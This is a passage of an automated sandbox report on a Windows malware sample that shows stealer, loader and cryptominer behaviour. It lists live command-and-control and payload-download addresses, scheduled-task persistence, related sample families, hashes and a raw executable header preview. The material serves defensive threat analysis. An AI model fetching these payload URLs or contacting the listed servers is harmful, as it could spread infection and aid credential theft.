                                                                                      https://grannyejh.lat/95639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://sectigo.com/CPS0skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://185.215.113.43/Zu7JuNko/index.phpUsersskotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://grannyejh.lat/5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3057320495.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://xmrig.com/wizard%sIntel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://31.41.244.11/files/dodo/random.exe8476K3skotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://31.41.244.11/files/dodo/random.exeskotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      		unknown
                                                                                                      http://31.41.244.11/files/dodo/random.exe%3skotes.exe, 00000006.00000002.3384635500.000000000109F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://31.41.244.11/files/burpin1/random.exeskotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ac.ecosia.org/autocomplete?q=5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://grannyejh.lat/apigsK25639a58f3b.exe, 0000000A.00000003.3284814163.000000000383F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxexsvchost.exe, 0000002B.00000002.3335720153.0000000002E3C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://185.215.113.43/Zu7JuNko/index.php~skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://pancakedipyps.click/h850609077b.exe, 0000000D.00000003.3360072814.0000000003A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://pancakedipyps.click/f850609077b.exe, 0000000D.00000003.3359993193.0000000003A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://xmrig.com/docs/algorithmsIntel_PTT_EK_Recertification.exe, 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://185.215.113.43/Zu7JuNko/index.phpeskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://usbtor.ru/viewtopic.php?t=798)Z7c1324dac5.exe, 0000000E.00000000.3117032209.0000000000423000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://185.215.113.43/Zu7JuNko/index.phprskotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            185.215.113.43
                                                                                                                            		unknownPortugal
                                                                                                                            		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                            172.67.179.109
                                                                                                                            		grannyejh.latUnited States
                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                            104.21.23.76
                                                                                                                            		pancakedipyps.clickUnited States
                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                            31.41.244.11
                                                                                                                            		unknownRussian Federation
                                                                                                                            		61974AEROEXPRESS-ASRUfalse
                                                                                                                            127.1.10.1
                                                                                                                            		unknownunknown
                                                                                                                            		unknownunknowntrue

                                                                                                                            Private

                                                                                                                            IP
                                                                                                                            127.0.0.1

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1577291
                                                                                                                            Start date and time:2024-12-18 11:07:01 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 10m 31s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:47
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:file.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.mine.winEXE@70/40@3/6
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:Failed
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            05:09:01API Interceptor806x Sleep call for process: skotes.exe modified
                                                                                                                            05:09:16API Interceptor4x Sleep call for process: 5639a58f3b.exe modified
                                                                                                                            05:09:28API Interceptor3x Sleep call for process: 850609077b.exe modified
                                                                                                                            05:09:43API Interceptor9x Sleep call for process: powershell.exe modified
                                                                                                                            11:07:55Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                            11:09:38Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                            172.67.179.109file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              104.21.23.76file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                        http://www.czeywd.net/perishing-flavoring/7ec4w2395u86zL12Q21YJ51Rc07R28UHsr8D_u4IIr-6IwxfhDtvsFEsvZ7zQboRoK5AH10Y6B1i@XbGet hashmaliciousPhisherBrowse
                                                                                                                                          http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogicalGet hashmaliciousUnknownBrowse
                                                                                                                                            http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogicalGet hashmaliciousPhisherBrowse

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              pancakedipyps.clickfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.209.202
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.209.202
                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.209.202
                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 188.114.96.6
                                                                                                                                              grannyejh.latfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.179.109

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              CLOUDFLARENETUSNativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                              • 104.26.13.205
                                                                                                                                              PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                              • 104.26.12.205
                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              https://2024sharepointonline.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                              • 104.16.20.118
                                                                                                                                              https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 1.1.1.1
                                                                                                                                              EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.18.86.42
                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.66.86
                                                                                                                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 185.215.113.43
                                                                                                                                              CLOUDFLARENETUSNativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                              • 104.26.13.205
                                                                                                                                              PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                              • 104.26.12.205
                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              https://2024sharepointonline.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                              • 104.16.20.118
                                                                                                                                              https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 1.1.1.1
                                                                                                                                              EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.18.86.42
                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.66.86

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                              • 172.67.179.109
                                                                                                                                              • 104.21.23.76

                                                                                                                                              Dropped Files

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exefile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4438776
                                                                                                                                                                  Entropy (8bit):7.99505709582503
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                  MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                  SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                  SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                  SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

